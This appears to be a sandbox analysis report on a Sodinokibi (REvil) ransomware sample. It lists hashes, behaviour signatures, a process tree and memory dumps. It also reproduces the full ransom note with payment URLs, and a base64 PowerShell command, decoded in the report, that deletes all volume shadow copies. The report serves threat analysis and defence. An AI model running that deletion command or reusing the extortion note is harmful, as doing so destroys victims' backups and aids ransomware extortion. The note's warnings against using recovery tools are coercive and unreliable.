Analysis

  • max time kernel
    12s
  • max time network
    14s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-11-2024 13:09

General

  • Target

    b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181.exe

  • Size

    164KB

  • MD5

    921b05d4fdd12c986bed19ae96d10fc4

  • SHA1

    b6cdb9f5693da24b95fb479b191504f7e22cf717

  • SHA256

    b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181

  • SHA512

    72f5dc8c1c205cba6bf89bc274beb57e31723736a9040c4231a12b8c2ff0095cf35201e993ee88b636165da465d5516dfeae50b1d332ba15c8a739a479c0ff21

  • SSDEEP

    3072:FHixaVZFiOCDJtOicNDWEzZz61d7canxB:FHigLF5CCj5zZ41

Malware Config

Extracted

Path

C:\Users\11xy9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 11xy9.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/120D228E2FAC83AE

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.top/120D228E2FAC83AE

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:

Key:

6+9RDy0E7vweAW0axGvieRQq2Hl5FsjM+gVZljQX50vThrQE2vbGDIkoaxUXFAz4
G8QqvgO8NbsDDbRq4kXotVONwcXI2YLIfXqHFtvx7caIopcxwlljmNYLXBzv9kx5
hV8xqRHITEoeeaEyOq0LcXCNv09SqB1oRXbi1JauUXvsoxoVptdCWB/UsLhWI846
fwhiQ7Z71gXHF7M71mjEwJTXIdicq5HcnIvanyBnSuHSDtJgHp2cXAKSrDesOD0t
dUIpov32v5wpV4WGHTGtkWwj0lPjOdYNCbF7+h3LotsGnjtRp1N45bKLzktiRgId
F2y7ojzySvm6aDCAM9nFSUGLZpVc+fBan06cv9X/jhGCAB3yXCUculdZqRyxbdN6
47b04IMGO6b0tHcoZYGYnrKq0X5Ia8RwPi+WHQuT+V5QajZrj9aycT0j9pya2Eb0
4zpxeO6/7/xHGS5gRLs/J5Nw7654MITAh80HGWg3bHyfskP/LU9lDfWwJ5XK9vLM
4dAqTTrIQV8RrvZs4g1gIo3zeq/jxuCv8GEXsU63VvTE9GXYdBi6baup+vN4QZcL
NZ2AQYRAGS34aRB3s3C1P8h0N4/Hi7O7NovqlEn+XSKOP2BNSdMORu2tkMtksC87
r21HzNvH1xwONLaOdDqjMU9wrw6Dq+oD6j7Fm0RNr8BY513KBuYL3DpIMYaepQCt
9ez7tCOBCT8F2rcz5NZ+TaLEzFeHaOQ5uwkoaIdEl89RDw3rbklkOfl8sSBFGjBy
skPBJernUj9ZVPD8FPW73DUSJaxmxYo1bS7a6LawRn2i1veqn2FioRds4TtAXvpp
IZVw0a4h9+2f2oSGs5aD9zNwwe+yLSgcv3zERqaKKHXKaHosFcqfaUnD8rsruRt9
/1GDQMbU+7R0bVFVh2lJ9bUJtCQILpLWKhrKjus+lmbGBvsSDD4ELWEVMdlr18Em
EXMM3rsJ8Wm6wp5hmMXfn9CzRZhkm8VPg1krGvOoT7yEEV/fExxFx+Uyl7ACjU/b
59IyF6miNxIdJo+v3sMFEhKd+la1CU0CfUxEe9zH5hIi0ArTeC3yEfeFM0Rooffz
y8nd6og06TRelR4DNV1oGbkOTQ4JThwwdQtEdbMgtz++H16ZEfVfi1EbI/NLODDu
R3+YPrb8z/tmdb6BXTABSofiWA8BerKI0WnZv5e2KBHCE3H0eeTj2rYEAnwoTf+2
mD7DwOjw

Extension name: 11xy9

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/120D228E2FAC83AE

http://decryptor.top/120D228E2FAC83AE

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181.exe
    "C:\Users\Admin\AppData\Local\Temp\b4e3091d3119268dfc8ac3caf2d5d02fd4faa360f822a87b50110b805e465181.exe"
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1812)
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is Base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      (deletion of all volume shadow copies, which is what the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe activity below reflect)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:2332
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    • Suspicious use of AdjustPrivilegeToken
    PID:2776

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\11xy9-readme.txt

    Filesize

    6KB

    MD5

    36498cb8adc2e7e5a80feb358d9811cd

    SHA1

    64ff42e2188a9dc482dc9051681f493668a05b5f

    SHA256

    3efa613f3d29c1c16188b5cac4d19cb60f6e0e276ae75181b64fbad97b2c1fb6

    SHA512

    bf75fa88d14e9bef856a891b803f99d5dfdf43723505d1949ec89f0976b8c0361eb3ba1fc2bd864a4f4f1e0c17c93389c304321821268fe984d6a3fa46db85be

  • memory/2020-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

    Filesize

    4KB

  • memory/2020-5-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

  • memory/2020-6-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

  • memory/2020-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2020-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2020-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2020-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2020-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/2020-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB